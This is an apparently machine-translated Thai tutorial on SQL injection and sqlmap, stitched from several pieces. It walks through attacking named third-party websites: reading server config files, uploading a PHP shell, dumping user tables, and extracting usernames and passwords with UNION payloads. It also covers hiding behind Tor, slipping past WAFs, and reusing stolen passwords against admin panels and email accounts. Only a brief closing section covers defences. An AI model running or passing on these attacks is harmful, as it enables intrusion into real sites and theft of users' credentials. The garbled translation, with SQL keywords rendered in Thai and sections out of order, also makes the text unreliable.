1. SQLMap และวัฟ (เว็บ แอปพลิเคชัน ไฟร์วอลล์ ): WAF เป็นชั้นการป้องกันเพิ่มเติมสำหรับเว็บแอปพลิเคชัน ทำให้การวิเคราะห์และการดำเนินการมีความซับซ้อนมากขึ้นโดยใช้วิธีมาตรฐานที่มีอยู่ใน SQLMap เพื่อจุดประสงค์นี้จึงมีฟังก์ชัน "tamper -script" ซึ่งช่วยให้ทำงานกับเว็บแอปพลิเคชันที่อยู่ด้านหลัง WAF ได้ง่ายขึ้นมาก
2. SQLMap และการไม่เปิดเผยตัวตน:หากคุณต้องการซ่อนข้อมูลประจำตัวของคุณและทำให้แอปพลิเคชันเป้าหมายไม่เปิดเผยตัวตน คุณสามารถใช้พร็อกซีเซิร์ฟเวอร์ TOR (The Onion Router) ได้ ใน SQLMap คุณสามารถกำหนดค่าพร็อกซี TOR เพื่อซ่อนแหล่งที่มาของการรับส่งข้อมูลหรือคำขอที่ถูกสร้างขึ้นด้วยคีย์ต่อไปนี้:
   • — ทอร์ – การสลับยูทิลิตี้เป็นโหมดพร็อกซี TOR
   • — — ทอร์ — พิมพ์ – การกำหนดค่าโปรโตคอลพร็อกซี TOR ด้วยตนเอง (HTTP /SOCKS 4/4a /5)
   • — — ตรวจสอบ — ทอร์ – ตรวจสอบการทำงานของพร็อกซี TOR

เอาล่ะเข้าเรื่อง:

สปอยเลอร์: เติมเปลือก

เรามี SQL Injection บนไซต์ที่มีลักษณะดังนี้:

คุณต้องลงทะเบียนเพื่อดูลิงก์

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --แบนเนอร์ --current-db --current-user --is-dba

คลิก เข้าและการวิเคราะห์ SQL Injection ของเราก็เริ่มต้นขึ้น รายงานจะมีลักษณะดังนี้:

ดังที่คุณเห็นในรายงาน มีการเขียนเวอร์ชันของ Apache, เวอร์ชันของ MySQL และเวอร์ชันของระบบปฏิบัติการที่ติดตั้งบนเซิร์ฟเวอร์ ทั้งหมดนี้จะเป็นประโยชน์สำหรับเราในอนาคต แต่ที่สำคัญที่สุดคือคุณจะเห็นได้ว่า เรามีสิทธิเขียนไฟล์ได้ โดยแสดงในบรรทัด Current User is DBA: True

ขั้นตอนต่อไปสำหรับเราคือการหาเส้นทางเพื่อบันทึกเปลือกของเรา เราสามารถรับเส้นทางไปยังเว็บไซต์ของเราบนเซิร์ฟเวอร์ได้โดยการดาวน์โหลดไฟล์ httpd.conf- เราได้รับข้อมูลเกี่ยวกับตำแหน่งของไฟล์ httpd.conf โดยใช้ Google คุณสามารถค้นหาตามเวอร์ชันของระบบปฏิบัติการที่ติดตั้งหรือตามรายการเส้นทางที่เป็นไปได้มากที่สุด โดยทั่วไปฉันจะไม่เจาะลึกในการท่องเสิร์ชเอ็นจิ้นเพียงเมื่อคุณพบตำแหน่งที่เป็นไปได้มากที่สุดของเส้นทางไปยังไฟล์แล้วก็ถึงเวลาดาวน์โหลดไฟล์เดียวกันนี้ลงในดิสก์ของคุณโดยทำสิ่งนี้โดยป้อนข้อมูลต่อไปนี้ คำสั่งและขอให้อ่านไฟล์บนเซิร์ฟเวอร์:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --file-read=/etc/httpd/conf/httpd.conf

โปรดทราบทันทีว่าการค้นหาไฟล์กำหนดค่านี้เป็นไปไม่ได้เสมอไปในครั้งแรก ดังนั้นคุณจึงใช้เส้นทางที่เป็นไปได้มากที่สุดว่าไฟล์นี้อาจอยู่ที่ใด:

รายการเส้นทางที่เป็นไปได้ไปยังไฟล์กำหนดค่า:

../../../../../../../../../usr/local/apache/conf/httpd.conf ../../../../ ../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../../../ usr/local/apache/httpd.conf ../../../../../../../../usr/local/apache2/httpd.conf ../../.. /../../../../../usr/local/httpd/conf/httpd.conf ../../../../../../../usr/ ท้องถิ่น/etc/apache/conf/httpd.conf ../../../../../../../usr/local/etc/apache2/conf/httpd.conf ../.. /../../../../../usr/local/etc/httpd/conf/httpd.conf ../../../../../../../ usr/apache2/conf/httpd.conf ../../../../../../../usr/apache/conf/httpd.conf ../../../.. /../../../usr/local/apps/apache2/conf/httpd.conf ../../../../../../../usr/local/apps/ apache/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../. ./etc/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../ ../../etc/http/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../. ./../../etc/httpd/httpd.conf ../../../../../../etc/http/httpd.conf ../../../. ./../../etc/httpd.conf ../../../../../opt/apache/conf/httpd.conf ../../../../. ./opt/apache2/conf/httpd.conf ../../../../var/www/conf/httpd.conf ../conf/httpd.conf

เราได้รับรายงานจาก sqlmap ในรูปแบบต่อไปนี้:

อย่างที่คุณเห็น sqlmap บอกเราว่าไฟล์มีขนาดเท่ากับไฟล์บนเซิร์ฟเวอร์ ดังนั้นเราจึงมีสิทธิ์อ่านไฟล์นี้ หากมีสิทธิ์ไม่เพียงพอในการอ่านไฟล์นี้ก็จะเกิดข้อผิดพลาดว่าไฟล์ที่บันทึกในเครื่องของเรามีขนาดแตกต่างจากไฟล์บนเซิร์ฟเวอร์หรือไม่มีไฟล์บนเซิร์ฟเวอร์ตามเส้นทางที่เราระบุและไม่เคยมี รับ Sqlmap บันทึกไฟล์ของเราไว้ในไฟล์รายงาน และหากต้องการอ่านมัน เราจำเป็นต้องเปิดตัวจัดการหน้าต่าง ในการเรียกใช้ตัวจัดการหน้าต่างให้เปิดหน้าต่างเทอร์มินัลอื่นแล้วป้อนคำสั่ง:

ต่อไปในตัวจัดการที่เปิดขึ้น เราจะปฏิบัติตามเส้นทางที่ sqlmap เพิ่มไฟล์ เช่น:
/root/.sqlmap/output/sacoor.com
จากนั้นเลื่อนเคอร์เซอร์ไปที่ไฟล์แล้วกดปุ่ม F3บนแป้นพิมพ์และอ่านไฟล์ปรับแต่ง Apache:

จากไฟล์กำหนดค่าของเรา เราพบว่าไซต์ของเราอยู่บนเซิร์ฟเวอร์ตามเส้นทางต่อไปนี้:
/home/sbshop/site/

ตอนนี้เรามีข้อมูลเพียงเล็กน้อยแล้ว เราก็สามารถลองเติมข้อมูลในเชลล์ได้ โดยป้อนคำสั่งต่อไปนี้:

หลังจากป้อนคำสั่งแล้ว sqlmap จะถามว่าเราต้องการใช้ฟิลเลอร์ชนิดใด เพราะ... ในกรณีของเรา เว็บไซต์เป็น PHP จากนั้นเราจะอัปโหลด ตัวโหลด PHP, เลือก จุดที่ 4และกด Enter ต่อไป sqlmap จะขอให้เราเลือกว่าเราจะอัพโหลดโหลดเดอร์ของเราที่ไหน และเนื่องจาก... เราทราบเส้นทางไปยังเว็บไซต์ของเราบนเซิร์ฟเวอร์แล้ว จากนั้นเลือก จุดที่ 2, กด เข้าและระบุเส้นทางไปยังเว็บไซต์:
/home/sbshop/site/

และหลังจากนั้นเราก็กด เข้าและเราเห็นรายงานต่อไปนี้:

ในกรณีนี้ sqlmap บอกเราว่าเราไม่มีสิทธิ์ในการเขียนโฟลเดอร์นี้ ไม่มีปัญหา ปัญหานี้แก้ไขได้ง่ายมาก เราให้คำสั่งให้เรียกใช้ Uniscan และตรวจสอบไฟล์และโฟลเดอร์เพื่อการเขียน นี่คือคำสั่ง:

Uniscan -u http://www.sacoor.com/ -qwe

ตอนนี้สแกนเนอร์จะตรวจสอบไดเร็กทอรีที่เขียนได้ทั้งหมด:

เครื่องสแกนพบไดเร็กทอรีสามไดเร็กทอรีที่สามารถเขียนไฟล์ได้ ดังนั้นเราจึงพยายามโหลดเชลล์โหลดเดอร์ของเราอีกครั้ง แต่คราวนี้แตกต่างออกไป รันคำสั่งอีกครั้ง:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --os-cmd –v l

และโดยการเลือก จุดที่ 4(กรอกสคริปต์ PHP) ระบุเส้นทาง:
/home/sbshop/site/admin

เราเห็นดังต่อไปนี้

สวัสดีผู้อ่าน เมื่อเร็ว ๆ นี้ ฉันสนใจในเรื่องความปลอดภัยของเว็บ และงานของฉันก็เกี่ยวข้องกับเรื่องนี้ในระดับหนึ่ง เพราะ บ่อยครั้งที่ฉันเริ่มสังเกตเห็นหัวข้อต่างๆ ในฟอรัมต่างๆ ที่ขอให้พวกเขาแสดงให้เห็นว่ามันทำงานอย่างไร ดังนั้นฉันจึงตัดสินใจเขียนบทความ บทความนี้จะมุ่งเป้าไปที่ผู้ที่ยังไม่เคยเจอสิ่งนี้แต่ต้องการเรียนรู้ มีบทความค่อนข้างมากในหัวข้อนี้บนอินเทอร์เน็ต แต่จะซับซ้อนเล็กน้อยสำหรับผู้เริ่มต้น ฉันจะพยายามอธิบายทุกอย่างด้วยภาษาที่ชัดเจนและตัวอย่างโดยละเอียด

คำนำ

เชื่อว่าแค่อ่านบทความอย่างเดียวคงไม่พอ เพราะ... เราต้องการตัวอย่างที่มีชีวิต - ดังที่คุณทราบ การฝึกฝนในกระบวนการท่องจำนั้นไม่เคยฟุ่มเฟือย ดังนั้นเราจะเขียนสคริปต์ที่มีช่องโหว่และฝึกฝนกับมัน

SQL Inject คืออะไร?

พ่อเขียนบันทึกถึงแม่เพื่อมอบเงิน 100 รูเบิลให้กับวาสยาแล้ววางลงบนโต๊ะ การนำสิ่งนี้กลับมาใช้ใหม่เป็นภาษา SQL แบบการ์ตูน เราได้รับ:
รับ 100 รูเบิลจากกระเป๋าเงินของคุณแล้วมอบให้วาสยา

เนื่องจากพ่อเขียนโน้ตได้ไม่ดี (ลายมืองุ่มง่าม) และทิ้งมันไว้บนโต๊ะ Petya น้องชายของ Vasya จึงเห็นมัน Petya ซึ่งเป็นแฮกเกอร์จึงเพิ่มคำว่า “OR Pete” ลงไปที่นั่น และผลลัพธ์ก็คือคำขอต่อไปนี้:
รับ 100 RUBLES จากกระเป๋าเงินของคุณแล้วมอบให้ Vasya หรือ Petya

แม่หลังจากอ่านบันทึกแล้วตัดสินใจว่าเธอให้เงินกับ Vasya เมื่อวานนี้และมอบ 100 รูเบิลให้กับ Petya นี่คือตัวอย่างง่ายๆ ของการฉีด SQL จากชีวิต :) โดยไม่ต้องกรองข้อมูล (แม่แทบจะไม่เข้าใจลายมือเลย) Petya ก็ทำกำไรได้

การตระเตรียม

ค้นหาการฉีด SQL

ตามที่คุณเข้าใจแล้ว การแทรกจะมาจากข้อมูลขาเข้าที่ไม่ได้กรอง ข้อผิดพลาดที่พบบ่อยที่สุดคือการไม่กรอง ID ที่ส่ง พูดคร่าวๆ ใส่เครื่องหมายคำพูดในทุกช่อง ไม่ว่าจะเป็นคำขอ GET/POST หรือแม้แต่คุกกี้!

พารามิเตอร์อินพุตตัวเลข

เพราะ คำขอของเราไม่มีการกรอง:

$id = $_GET["id"]; $query = "SELECT * จากข่าว WHERE id=$id";

สคริปต์จะเข้าใจสิ่งนี้เป็น

SELECT * จากข่าว โดยที่ id=1"

และมันจะทำให้เรามีข้อผิดพลาด:
คำเตือน: mysql_fetch_array() คาดว่าพารามิเตอร์ 1 จะเป็นทรัพยากร โดยให้บูลีนใน C:\WebServ\domains\sqlinj\index1.php ออนไลน์ที่ 16

หากข้อผิดพลาดไม่ปรากฏขึ้น อาจเกิดจากสาเหตุต่อไปนี้:

1.การแทรก SQL ไม่อยู่ที่นี่ - ราคาถูกกรองแล้ว หรือคุ้มค่าที่จะแปลงเป็น (int)
2. เอาต์พุตข้อผิดพลาดถูกปิดใช้งาน

หากคุณยังคงได้รับข้อผิดพลาด - ไชโย! เราพบการฉีด SQL ประเภทแรก - พารามิเตอร์อินพุตตัวเลข

พารามิเตอร์อินพุตสตริง

เราจะส่งคำขอไปที่ index2.php- ในไฟล์นี้ คำขอจะมีลักษณะดังนี้:
$user = $_GET["ผู้ใช้"]; $query = "เลือก * จากข่าว WHERE user="$user"";

ที่นี่เราเลือกข่าวตามชื่อผู้ใช้ และอีกครั้ง เราไม่ได้กรอง
เราส่งคำขอพร้อมใบเสนอราคาอีกครั้ง:

มันทำให้เกิดข้อผิดพลาด ตกลง! ซึ่งหมายความว่ามีช่องโหว่ สำหรับผู้เริ่มต้น นั่นก็เพียงพอแล้วสำหรับเรา - มาฝึกซ้อมกันดีกว่า

มาดำเนินการกันเถอะ

ทฤษฎีเล็กน้อย

คุณอาจแทบรอไม่ไหวที่จะได้อะไรจากสิ่งนี้นอกเหนือจากความผิดพลาด ก่อนอื่นให้เข้าใจว่าป้าย " -- " ถือเป็นความคิดเห็นใน SQL

ความสนใจ! จะต้องมีช่องว่างก่อนและหลัง ใน URL จะถูกส่งเป็น %20

ทุกอย่างที่เกิดขึ้นหลังจากความคิดเห็นจะถูกละทิ้ง นั่นคือคำขอ:
SELECT * จากข่าว WHERE user="AlexanderPHP" -- habrahabra

มันจะประสบความสำเร็จ คุณสามารถลองสิ่งนี้บนสคริปต์ index2.php โดยส่งคำขอดังนี้:

Sqlinj/index2.php?user=AlexanderPHP"%20--%20habrahabr

เรียนรู้พารามิเตอร์ ยูเนี่ยน- ในภาษา SQL คำหลัก ยูเนี่ยนใช้เพื่อรวมผลลัพธ์ของแบบสอบถาม SQL สองรายการไว้ในตารางเดียว นั่นคือเพื่อดึงสิ่งที่เราต้องการออกมาจากโต๊ะอื่น

มาใช้ประโยชน์จากมันกันเถอะ

หากพารามิเตอร์เป็น "ตัวเลข" เราไม่จำเป็นต้องส่งใบเสนอราคาในคำขอและใส่ความคิดเห็นไว้ตอนท้ายตามปกติ กลับไปที่สคริปต์กัน index1.php.

ลองเปลี่ยนเป็นสคริปต์ sqlinj/index1.php?id=1 UNION SELECT 1 แบบสอบถามฐานข้อมูลของเรามีลักษณะดังนี้:
SELECT * จากข่าว WHERE id=1 UNION SELECT 1
และเขาทำให้เราผิดพลาดเพราะ... ในการทำงานกับการสืบค้นแบบรวม เราจำเป็นต้องมีฟิลด์จำนวนเท่ากัน

เพราะ เราไม่สามารถควบคุมหมายเลขของพวกเขาในคำขอแรกได้ จากนั้นเราต้องเลือกหมายเลขของพวกเขาในคำขอที่สองเพื่อให้เท่ากับหมายเลขแรก

การเลือกจำนวนช่อง

การเลือกฟิลด์นั้นง่ายมาก เพียงส่งคำขอต่อไปนี้:
sqlinj/index1.php?id=1 ยูเนี่ยนเลือก 1,2
ข้อผิดพลาด…
sqlinj/index1.php?id=1 ยูเนี่ยนเลือก 1,2,3
ผิดพลาดอีกแล้ว!
sqlinj/index1.php?id=1 ยูเนี่ยนเลือก 1,2,3,4,5
ไม่มีข้อผิดพลาด! ซึ่งหมายความว่าจำนวนคอลัมน์คือ 5

จัดกลุ่มตาม

หากเป็นการร้องขอ
sqlinj/index1.php?id=1 จัดกลุ่มตาม 2
ไม่แสดงข้อผิดพลาดใดๆ ซึ่งหมายความว่ามีจำนวนฟิลด์มากกว่า 2 เรามาลองกัน:

Sqlinj/index1.php?id=1 จัดกลุ่มตาม 8
อ๊ะ เราเห็นข้อผิดพลาด หมายความว่าจำนวนฟิลด์น้อยกว่า 8

หากไม่มีข้อผิดพลาดกับ GROUP BY 4 และด้วย GROUP BY 6 มีข้อผิดพลาด จำนวนฟิลด์คือ 5

การกำหนดคอลัมน์เอาท์พุต

Sqlinj/index1.php?id=-1 ยูเนี่ยนเลือก 1,2,3,4,5

ด้วยการกระทำนี้ เราได้กำหนดว่าคอลัมน์ใดจะแสดงบนเพจ ในตอนนี้ หากต้องการแทนที่หมายเลขเหล่านี้ด้วยข้อมูลที่จำเป็น คุณจะต้องดำเนินการคำขอต่อไป

เอาท์พุทข้อมูล

สมมติว่าเรารู้ว่าตารางยังคงอยู่ ผู้ใช้ซึ่งมีทุ่งนาอยู่ รหัส, ชื่อและ ผ่าน.
เราจำเป็นต้องได้รับข้อมูลเกี่ยวกับผู้ใช้ที่มี ID=1

ดังนั้น เรามาสร้างแบบสอบถามต่อไปนี้:

Sqlinj/index1.php?id=-1 UNION เลือก 1,2,3,4,5 จากผู้ใช้ โดยที่ id=1
สคริปต์ยังคงส่งออกต่อไป

ในการดำเนินการนี้ เราจะแทนที่ชื่อของช่องต่างๆ แทนหมายเลข 1 และ 3

Sqlinj/index1.php?id=-1 ชื่อ UNION SELECT,2,ผ่าน,4,5 จากผู้ใช้โดยที่ id=1
เราได้สิ่งที่เราต้องการแล้ว!

สำหรับ "พารามิเตอร์อินพุตสตริง" เช่นเดียวกับในสคริปต์ index2.phpคุณต้องเพิ่มเครื่องหมายคำพูดที่จุดเริ่มต้นและเครื่องหมายความคิดเห็นที่ส่วนท้าย ตัวอย่าง:
sqlinj/index2.php?user=-1" ชื่อ UNION SELECT,2,ผ่าน,4,5 จากผู้ใช้ โดยที่ id=1 --%20

อ่าน/เขียนไฟล์

ไฟล์บันทึก

กำลังอ่านไฟล์

Sqlinj/index2.php?user=-1" ยูเนี่ยนเลือก 1,LOAD_FILE("1.php"),3,4,5 --%20

ดังนั้นเราจึงได้อ่านไฟล์ที่เขียนไว้ก่อนหน้านี้แล้ว

วิธีการป้องกัน

การป้องกันตัวเองนั้นง่ายกว่าการหาประโยชน์จากจุดอ่อน เพียงกรองข้อมูล หากคุณกำลังผ่านตัวเลขให้ใช้
$id = (int) $_GET["id"];
ตามที่ผู้ใช้ malroc แนะนำ ป้องกันตัวเองโดยใช้ PDO หรือข้อความที่เตรียมไว้

แทนที่จะทำให้เสร็จ

sqlmap คืออะไรและมีไว้เพื่ออะไร?

โปรแกรมนี้ช่วยให้คุณตรวจสอบไซต์เพื่อหาช่องโหว่ของการแทรก SQL, ช่องโหว่ XSS และยังใช้ประโยชน์จากการแทรก SQL รองรับการแทรก SQL ประเภทต่างๆ และฐานข้อมูลที่หลากหลาย

คุณสามารถทำอะไรกับ sqlmap

ด้วย sqlmap คุณสามารถ:

• ตรวจสอบว่าเว็บไซต์มีช่องโหว่หรือไม่

หากไซต์เสี่ยงต่อการถูกฉีด SQL ก็เป็นไปได้:

• รับข้อมูลจากฐานข้อมูลรวมทั้งฐานข้อมูลดัมพ์ (ทั้งหมด)
• แก้ไขและลบข้อมูลจากฐานข้อมูล
• อัปโหลดเชลล์ (แบ็คดอร์) ไปยังเว็บเซิร์ฟเวอร์

หนึ่งในสถานการณ์สำหรับการใช้ sqlmap:

• รับ Username และ Password จากฐานข้อมูล
• ค้นหาแผงการดูแลระบบไซต์ (แผงผู้ดูแลระบบ)
• เข้าสู่ระบบแผงผู้ดูแลระบบด้วยข้อมูลเข้าสู่ระบบและรหัสผ่านที่ได้รับ

หากมีช่องโหว่ การโจมตีสามารถพัฒนาไปในทิศทางต่างๆ:

• การปรับเปลี่ยนข้อมูล
• เติมประตูหลัง
• การแทรกโค้ด JavaScript เพื่อรับข้อมูลผู้ใช้
• การใช้โค้ดสำหรับการเชื่อมต่อกับ BeEF

ดังที่เราเห็นแล้วว่าการแทรก SQL ถือเป็นช่องโหว่ที่อันตรายมากซึ่งทำให้ผู้โจมตีมีโอกาสที่ดี

การตรวจสอบเว็บไซต์โดยใช้ sqlmap

หากไซต์ได้รับข้อมูลจากผู้ใช้โดยใช้วิธี GET (เมื่อมองเห็นทั้งชื่อของตัวแปรและข้อมูลที่ส่งในแถบที่อยู่ของเบราว์เซอร์) คุณจะต้องเลือกที่อยู่ของเพจที่ตัวแปรนี้อยู่ ปัจจุบัน. มันมาหลังเครื่องหมายคำถาม ( ? ), ตัวอย่างเช่น:

• http://www.dwib.org/faq2.php?id=8
• http://www.wellerpools.com/news-read.php?id=22
• http://newsandviews24.com/read.php?id=p_36

ในที่อยู่แรก ชื่อตัวแปรคือ รหัสและค่าที่ส่งผ่านคือ 8 - ที่อยู่ที่สองจะมีชื่อตัวแปรด้วย รหัสและค่าที่ส่ง 22 - ในตัวอย่างที่สาม ชื่อตัวแปรเหมือนกัน แต่ค่าที่ส่งผ่านคือ p_36- ชื่อตัวแปรเดียวกันคือการจับคู่แบบสุ่มสำหรับไซต์ต่างๆ อาจเป็นอะไรก็ได้ ข้อมูลที่ส่งอาจเป็นอะไรก็ได้ อาจมีตัวแปรหลายตัวโดยมีค่าคั่นด้วยสัญลักษณ์ & .

หากเราต้องการตรวจสอบว่าตัวแปร id เสี่ยงต่อการแทรก SQL หรือไม่ เราจำเป็นต้องป้อนที่อยู่ทั้งหมด - http://www.dwib.org/faq2.php?id=8 (ไม่ใช่ http://www.dwib .org /faq2.php หรือ http://www.dwib.org)

คำสั่งเพื่อตรวจสอบตัวแปรที่ส่งผ่านโดยวิธี GET นั้นง่ายมาก:

Sqlmap -u site_address

สำหรับไซต์เหล่านี้ คำสั่งจะเป็น:

Sqlmap -u http://www.dwib.org/faq2.php?id=8 sqlmap -u http://www.wellerpools.com/news-read.php?id=22 sqlmap -u http://newsandviews24 .com/read.php?id=p_36

ในระหว่างกระบวนการตรวจสอบ sqlmap อาจถามคำถามต่าง ๆ และคุณต้องตอบคำถามเหล่านั้น ย(เช่นใช่) หรือ n(เช่น ไม่) ตัวอักษร y และ n อาจเป็นตัวพิมพ์ใหญ่หรือเล็กก็ได้ ตัวพิมพ์ใหญ่หมายถึงตัวเลือกเริ่มต้น หากคุณเห็นด้วย ให้กด Enter

ตัวอย่างสถานการณ์และคำถาม:

การวิเคราะห์พฤติกรรมตรวจพบว่าเป้าหมายได้รับการปกป้องโดย WAF/IPS/IDS บางประเภท คุณต้องการให้ sqlmap พยายามตรวจจับแบ็กเอนด์ WAF/IPS/IDS หรือไม่

การวิเคราะห์พฤติกรรมระบุว่าเป้าหมายได้รับการปกป้องโดย WAF/IPS/IDS บางประเภท คุณต้องการให้ sqlmap พยายามระบุชื่อของ WAF/IPS/IDS หรือไม่

คำขอโปรดของฉัน:

การทดสอบแบบศึกษาสำนึก (พื้นฐาน) แสดงให้เห็นว่าพารามิเตอร์ GET "id" อาจเป็นแบบฉีดได้ (DBMS ที่เป็นไปได้: "MySQL") การทดสอบสำหรับการแทรก SQL บนพารามิเตอร์ GET "id" ดูเหมือนว่า DBMS ส่วนหลังคือ "MySQL" คุณต้องการข้ามเพย์โหลดทดสอบเฉพาะสำหรับ DBMS อื่นๆ หรือไม่

ประเด็นก็คือการวิเคราะห์พฤติกรรมได้พิจารณาว่าพารามิเตอร์อาจมีช่องโหว่และมีการระบุ DBMS ระยะไกลแล้ว ระบบจะถามว่าเราต้องการตรวจสอบต่อไปหรือไม่ และในภาพหน้าจอที่สอง ไซต์ดังกล่าวยังมีความเสี่ยงต่อ XSS อีกด้วย

หากคุณต้องการทำให้กระบวนการเป็นแบบอัตโนมัติเพื่อให้ sqlmap ไม่ถามคุณทุกครั้ง แต่ใช้การเลือกเริ่มต้น (มีตัวเลือกที่ดีกว่าเสมอ) คุณสามารถรันคำสั่งด้วยตัวเลือกได้ --แบทช์:

Sqlmap -u http://www.dwib.org/faq2.php?id=8 --แบทช์

ปัญหาที่อาจเกิดขึ้นเมื่อสแกน sqlmap

ข้อผิดพลาดต่อไปนี้อาจปรากฏขึ้น:

การเชื่อมต่อกับ URL เป้าหมายหมดเวลา sqlmap กำลังจะลองคำขออีกครั้งหากปัญหายังคงมีอยู่ โปรดตรวจสอบว่า URL เป้าหมายที่ให้มานั้นถูกต้อง ในกรณีที่เป็นเช่นนั้น คุณสามารถลองรันใหม่โดยเปิดสวิตช์ "--random-agent" และ/หรือสวิตช์พร็อกซี ("--ignore-proxy", "--proxy",...)

หมายความว่าเว็บไซต์ไม่ต้องการ "พูดคุย" กับ sqlmap เป็นตัวเลือกที่เราเสนอให้ใช้ --สุ่มตัวแทน- หากคุณสามารถดูไซต์ในเบราว์เซอร์ได้ แต่ sqlmap เขียนเกี่ยวกับความเป็นไปไม่ได้ในการเชื่อมต่อ แสดงว่าไซต์นั้นเพิกเฉยต่อคำขอ โดยมุ่งเน้นไปที่ตัวแทนผู้ใช้ ตัวเลือก --random-agent เปลี่ยนค่า sqlmap มาตรฐานเป็นแบบสุ่ม:

Sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent

อีกสาเหตุหนึ่งของข้อผิดพลาดนี้อาจเป็นได้ว่า IP ของคุณถูกบล็อกโดยเว็บไซต์ - จากนั้นคุณต้องใช้พรอกซี หากคุณใช้พร็อกซีอยู่แล้วและข้อผิดพลาดนี้ปรากฏขึ้น อาจหมายความว่าพร็อกซีมีปัญหาในการสื่อสาร และคุณควรลองโดยไม่ใช้พร็อกซีดังกล่าว

ผลลัพธ์การสแกน sqlmap

การฉีด SQL ที่ตรวจพบจะแสดงดังนี้:

เหล่านั้น. จะถูกเน้นด้วยสีเขียวตัวหนา เขียนชื่อพารามิเตอร์ที่มีช่องโหว่ ชนิดของช่องโหว่ SQL และมีคำว่า ฉีดได้.

รับรายการฐานข้อมูลด้วย sqlmap

หากต้องการรับรายการฐานข้อมูล ให้ใช้ตัวเลือก --dbs- ตัวอย่าง:

Sqlmap -u http://www.dwib.org/faq2.php?id=8 --dbs sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent --dbs sqlmap -u http://newsandviews24.com/read.php?id=p_36 --dbs

การดึงข้อมูลจากฐานข้อมูล

ตัวอย่างเช่น พบฐานข้อมูลสองฐานข้อมูลสำหรับไซต์ wellerpools.com:

[*] information_schema [*] main_wellerpools

ฉันต้องการทราบรายการตารางในฐานข้อมูล main_wellerpools เมื่อต้องการทำเช่นนี้ ให้ใช้ตัวเลือก --ตาราง- นอกจากนี้เรายังต้องระบุตารางที่เราสนใจหลังตัวเลือกด้วย -D:

Sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent -D main_wellerpools --tables

รายชื่อตาราง:

ด้วยเหตุผลบางอย่าง ฉันต้องการทราบรายการคอลัมน์จากตารางผู้ใช้ เมื่อต้องการทำเช่นนี้ ให้ใช้ตัวเลือก --คอลัมน์- นอกจากนั้นเราจำเป็นต้องระบุฐานข้อมูลที่เราสนใจ ( -D main_wellerpools) และหลังกุญแจ -ตตารางที่เราต้องการดูรายการคอลัมน์:

Sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent -D main_wellerpools -T ผู้ใช้ --columns

หากต้องการแสดงเนื้อหา ให้ใช้ตัวเลือก --การถ่ายโอนข้อมูล- สามารถระบุร่วมกับฐานข้อมูลได้ จากนั้นจะมีการสร้างดัมพ์ของฐานข้อมูลทั้งหมด หรือคุณสามารถจำกัดข้อมูลไว้ที่ตารางเดียวหรือคอลัมน์เดียวก็ได้ ด้วยคำสั่งต่อไปนี้ ฉันต้องการดูเนื้อหาของตารางผู้ใช้ทั้งหมด:

Sqlmap -u http://www.wellerpools.com/news-read.php?id=22 --random-agent -D main_wellerpools -T ผู้ใช้ --dump

ดูรหัสผ่าน - เมื่อตรวจสอบอย่างรวดเร็ว ฉันคิดว่ามันเป็นแฮช ผู้ดูแลระบบพยายามปกป้องตัวเองจริงๆ แต่ก็ไม่ได้ช่วยอะไรพวกเขา

อย่างไรก็ตาม เนื่องจากพารามิเตอร์ที่รับข้อมูลที่ส่งโดยวิธี GET นั้นมีช่องโหว่ คุณจึงสามารถสร้างคำขอได้โดยตรงในบรรทัดเบราว์เซอร์ในลักษณะที่ข้อมูลเข้าสู่ระบบและรหัสผ่านของผู้ใช้จะปรากฏบนเว็บไซต์โดยตรง:

• http://www.wellerpools.com/news-read.php?id=-22+union+select+1,group_concat(user_name,0x3a,user_pwd),3,4,5,6,7,8,9, 10+จาก+ผู้ใช้--
• http://www.wellerpools.com/news-read.php?id=-22+UNION+SELECT+1,group_concat(user_id,0x3e,user_name,0x3e,user_pwd),3,4,5,6,7, 8,9,10+จาก+ผู้ใช้--

เหล่านั้น. เรามีชื่อผู้ใช้ รหัสผ่าน และอีเมลของผู้ใช้ (และอาจเป็นผู้ดูแลระบบด้วยซ้ำ) ของเว็บไซต์ หากคุณพบแผงการดูแลระบบของไซต์ คุณสามารถควบคุมไซต์หรือเว็บเซิร์ฟเวอร์ได้ เนื่องจากผู้ใช้ชื่นชอบรหัสผ่านเดียวกันและรู้จักกล่องจดหมายของพวกเขา คุณสามารถลองแฮ็กเมลของพวกเขาได้

โดยทั่วไปแล้ว การแทรก SQL ถือเป็นช่องโหว่ที่อันตรายมาก